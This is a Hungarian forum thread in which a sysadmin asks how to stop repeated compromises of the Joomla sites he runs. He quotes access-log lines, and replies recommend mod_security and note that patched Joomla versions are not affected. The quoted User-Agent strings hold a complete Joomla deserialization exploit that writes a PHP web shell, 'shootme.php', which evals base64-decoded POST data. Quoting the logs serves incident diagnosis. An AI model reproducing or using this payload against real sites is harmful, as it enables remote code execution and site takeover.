Hello,
Üzemeltetek jópár joomla-s oldalt (nem az enyémek), amit rendszeresen rommá törnek.
Mindenhol a legfrissebb verzió van fent, de tegnapelőtt megint telerajzolták az összes érintett oldal mindenféle php fájlokkal.
iWatch, maldet , auditd megy ezerrel, de ezzel nem akadályozok meg semmit csak látom, hogy mi történik.
A kérdés az lenne, hogy mit tudok még tenni azon kívül hogy read-only-ba raktam az összes oldalt miután ki lett takarítva ?
Az other_vhost.logban ezt látom:
"192.151.150.42" www.xxxx.hu:80 192.168.xx.xx - - [28/Dec/2016:15: 59:53 +0100] "GET / HTTP/1.1" 200 6735 "-" "}__test|O:21:\"JDatabaseDriverMysqli \":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandle rs\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDri verMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_RO OT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['3 60'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\ \\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_nam e_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatab aseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9 "
"192.151.150.42" www.yyyy.hu:80 192.168.xx.xx - - [28/Dec/2016:22 :45:05 +0100] "GET / HTTP/1.1" 503 3038 "-" "}__test|O:21:\"JDatabaseDriverMysql i\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandl ers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDr iverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_R OOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST[' 360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\ \\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_na me_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JData baseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd 9"
Köszönöm!
Hozzászólások
apache mod_security vel lehet próbálkozni.
Fedora 24, Thinkpad x220
Ha valoban a legfrisseb joomla van fent akkor ez a tamadas mar nem mukodik. Ha ezt latod a logban akkor valoszinu hogy teszteltek hogy sebezheto e az oldalad, igy valoszinu hogy mashogy jutottak be.
Sucuri irt is errol itt
Az exploitrol bovebben
Teszteld ujra pl.: itt
Igen, elvileg a legfrissebb már nem érintett ebben. Lehet, hogy máshogy jöttek be, de az időpont stimmel. A Sucuri-s cikket olvastam, a teszt linket köszönöm, kipróbálom.